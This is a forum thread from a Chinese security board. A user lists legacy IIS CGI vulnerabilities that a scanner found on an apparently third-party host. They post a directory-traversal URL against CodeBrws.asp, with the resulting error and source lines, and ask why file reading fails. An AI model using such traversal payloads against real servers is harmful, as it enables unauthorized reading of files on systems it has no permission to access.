论坛: 菜鸟乐园 标题: 为什么codebrws.asp不起作用? 复制本贴地址    
作者: free__man [free__man]    论坛用户   登录
用X-Scan v2.3扫描一台机子,有以下CGI漏洞:
/iissamples/sdk/asp/docs/codebrws.asp [漏洞描述] 
/index.asp%81 [漏洞描述] 
/msadc/msadcs.dll [漏洞描述] 

我想利用codebrws.asp这个漏洞,可是在地址栏里输入: http://xx.xx.xx.xx/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/xxx.asp

出现以下错误:

错误类型:
Microsoft VBScript 运行时错误 (0x800A004C)
/iissamples/sdk/asp/docs/CodeBrws.asp, 第 105 行

查看CodeBrws.asp的源代码,第105行是:

        Dim FileObject, oInStream, strOutput
        Set FileObject = CreateObject("Scripting.FileSystemObject")
===>        Set oInStream = FileObject.OpenTextFile(strFilename, 1, 0, 0)
        While NOT oInStream.AtEndOfStream
          strOutput = oInStream.ReadLine
          Call PrintLine(strOutput, fCheckLine(strOutput))
          Response.Write "<BR>"
        Wend

即找不文件,请问怎么办?(确认文件名没输错)


地主 发表时间: 05/10 16:28

回复: free__man [free__man]   论坛用户   登录
UP

B1层 发表时间: 05/11 13:55

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号